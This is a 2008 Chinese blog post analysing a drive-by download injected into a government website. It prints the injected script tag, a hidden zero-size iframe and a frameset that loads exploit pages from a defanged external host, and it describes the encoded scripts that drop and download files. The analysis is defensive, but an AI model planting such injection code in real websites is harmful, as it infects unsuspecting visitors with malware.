某政府网站被加入的自动下载病毒文件的代码再创新花样(第1版)

王朝html/css/js·作者佚名  2008-06-01
窄屏简体版  字體: |||超大  

endurer原创

今天浏览前几天说的那个被加入恶意代码的政府网站(详见: 某政府网站被加入的自动下载病毒文件的代码变了花样(第1版) ),又发现了新花样。

政府网站首页加入的代码为:

<script language="javascript" src="hxXP://www.***snqc.cn/images/mail.js"></script>

mail.js的内容为:

document.write("<iframe src=hxxp://www.***snqc.cn/images/error.htm width=0 height=0></iframe>");

error.htm的内容为:

<frameset rows="444,0" cols="*">

<frame src="hxxp://help.3721.com/error.Html" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">

<frame src="top.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">

<frame src="gif.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">

<frame src="hxxp://help.3721.com/error.html" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">

</frameset>

top.htm 瑞星报为:Exploit.VBS.Phel.z,江民KV报为:Exploit.VBS.Phel.ab,KASPersky报为:Exploit.VBS.Phel.be。

gif.htm 瑞星报为:Exploit.HTML.Mht,江民KV不报,Kaspersky报为:Exploit.HTML.Mht。

top.htm的内容是用escape()加密的脚本。此脚本会尝试生成文件c:\WINDOWS\Help\apps.chm,自动下载:hxxp://www.***snqc.cn/images/tzd.js。

tzd.js的内容也是用escape()加密的脚本,其中部分代码使用escape()加密了两次。此脚本会尝试生成文件C:\AUTOEXEC.COM,c:\NTDETECT.hta。

tzd.js:瑞星和江民KV报为Exploit.VBS.Phel,Kaspersky报为:Exploit.VBS.Phel.bq。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航